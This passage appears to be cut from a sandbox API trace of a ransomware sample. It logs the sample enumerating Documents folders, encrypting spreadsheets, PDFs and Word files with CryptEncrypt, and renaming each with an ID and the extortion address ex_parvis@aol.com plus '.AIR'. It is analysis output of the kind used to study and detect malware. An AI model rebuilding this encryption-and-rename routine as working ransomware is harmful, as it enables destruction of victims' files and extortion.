lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=85507) returned 1 [0173.105] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14e03 [0173.105] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.105] GetProcessHeap () returned 0x2e0000 [0173.105] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.105] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.105] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.106] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.106] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.107] ReadFile (in: hFile=0x620, lpBuffer=0x3110048, nNumberOfBytesToRead=0x14e03, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x14e03, lpOverlapped=0x0) returned 1 [0173.110] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.110] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.110] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx", dwFileAttributes=0x80) returned 1 [0173.110] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx") returned 92 [0173.110] GetProcessHeap () returned 0x2e0000 [0173.111] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11e) returned 0x32f900 [0173.111] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx" [0173.111] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" [0173.111] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\1k80w7ydpt2jsxpaw.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\1k80w7ydpt2jsxpaw.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.113] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\DDywzPzDkH7L9z1-g\\1k80W7yDPt2JSXpAW.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ddywzpzdkh7l9z1-g\\1k80w7ydpt2jsxpaw.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0173.114] GetProcessHeap () returned 0x2e0000 [0173.114] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.114] GetFileSizeEx (in: hFile=0x620, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=5408) returned 1 [0173.114] SetFilePointer (in: hFile=0x620, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1520 [0173.114] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.114] GetProcessHeap () returned 0x2e0000 [0173.114] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.114] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.114] WriteFile (in: hFile=0x620, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.115] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.115] WriteFile (in: hFile=0x620, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.115] ReadFile (in: hFile=0x620, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x1520, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x1520, lpOverlapped=0x0) returned 1 [0173.115] SetFilePointer (in: hFile=0x620, lDistanceToMove=-5408, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.115] WriteFile (in: hFile=0x620, lpBuffer=0x3d7938*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d7938*, lpNumberOfBytesWritten=0x2acf9c8*=0x1520, lpOverlapped=0x0) returned 1 [0173.116] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1077c220, ftCreationTime.dwHighDateTime=0x1d4d32d, ftLastAccessTime.dwLowDateTime=0xb5280650, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb5280650, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3843f0 [0173.117] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.117] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.117] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf", dwFileAttributes=0x80) returned 1 [0173.117] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf") returned 66 [0173.117] GetProcessHeap () returned 0x2e0000 [0173.117] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x31d01e0 [0173.117] lstrcpyW (in: lpString1=0x31d01e0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf" [0173.117] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf.12781717671972518758.ex_parvis@aol.com.AIR" [0173.117] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\uqm1.pdf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\uqm1.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.120] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\uqm1.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\uqm1.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0173.120] GetProcessHeap () returned 0x2e0000 [0173.120] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0173.120] GetFileSizeEx (in: hFile=0x624, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=84613) returned 1 [0173.120] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x14a85 [0173.120] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.120] GetProcessHeap () returned 0x2e0000 [0173.120] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.120] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.120] WriteFile (in: hFile=0x624, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.121] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.121] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.122] ReadFile (in: hFile=0x624, lpBuffer=0x3110048, nNumberOfBytesToRead=0x14a85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x14a85, lpOverlapped=0x0) returned 1 [0173.125] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.125] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.125] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls", dwFileAttributes=0x80) returned 1 [0173.126] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls") returned 76 [0173.126] GetProcessHeap () returned 0x2e0000 [0173.126] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363b58 [0173.126] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls" [0173.126] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls.12781717671972518758.ex_parvis@aol.com.AIR" [0173.126] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\twgut_mlkuticr.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\twgut_mlkuticr.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.128] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\TWGUT_MlkUtIcR.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\twgut_mlkuticr.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0173.128] GetProcessHeap () returned 0x2e0000 [0173.128] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0173.128] GetFileSizeEx (in: hFile=0x624, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=69265) returned 1 [0173.128] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10e91 [0173.128] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.128] GetProcessHeap () returned 0x2e0000 [0173.128] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.129] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.129] WriteFile (in: hFile=0x624, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.139] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.139] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.139] ReadFile (in: hFile=0x624, lpBuffer=0x3110048, nNumberOfBytesToRead=0x10e91, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x10e91, lpOverlapped=0x0) returned 1 [0173.139] SetFilePointer (in: hFile=0x624, lDistanceToMove=-69265, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.139] WriteFile (in: hFile=0x624, lpBuffer=0x3120ee8*, nNumberOfBytesToWrite=0x10e91, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3120ee8*, lpNumberOfBytesWritten=0x2acf9c8*=0x10e91, lpOverlapped=0x0) returned 1 [0173.141] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.141] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.141] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc", dwFileAttributes=0x80) returned 1 [0173.142] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc") returned 82 [0173.142] GetProcessHeap () returned 0x2e0000 [0173.142] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x32f868 [0173.142] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc" [0173.142] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc.12781717671972518758.ex_parvis@aol.com.AIR" [0173.142] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\oeeeplypne1jpcoa3kxl.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\oeeeplypne1jpcoa3kxl.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.145] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\OeeEplYpNE1jPcoA3kxL.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\oeeeplypne1jpcoa3kxl.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0173.145] GetProcessHeap () returned 0x2e0000 [0173.146] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.146] GetFileSizeEx (in: hFile=0x624, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=95470) returned 1 [0173.146] SetFilePointer (in: hFile=0x624, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x174ee [0173.146] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.146] GetProcessHeap () returned 0x2e0000 [0173.146] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.146] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.146] WriteFile (in: hFile=0x624, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.147] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.147] WriteFile (in: hFile=0x624, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.147] ReadFile (in: hFile=0x624, lpBuffer=0x3110048, nNumberOfBytesToRead=0x174ee, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x174ee, lpOverlapped=0x0) returned 1 [0173.150] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.150] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.151] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls", dwFileAttributes=0x80) returned 1 [0173.151] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls") returned 68 [0173.151] GetProcessHeap () returned 0x2e0000 [0173.151] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x32f900 [0173.151] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls" [0173.151] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls.12781717671972518758.ex_parvis@aol.com.AIR" [0173.151] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\kocx94.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\ea49e\\kocx94.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.154] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\EA49E\\kocx94.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js 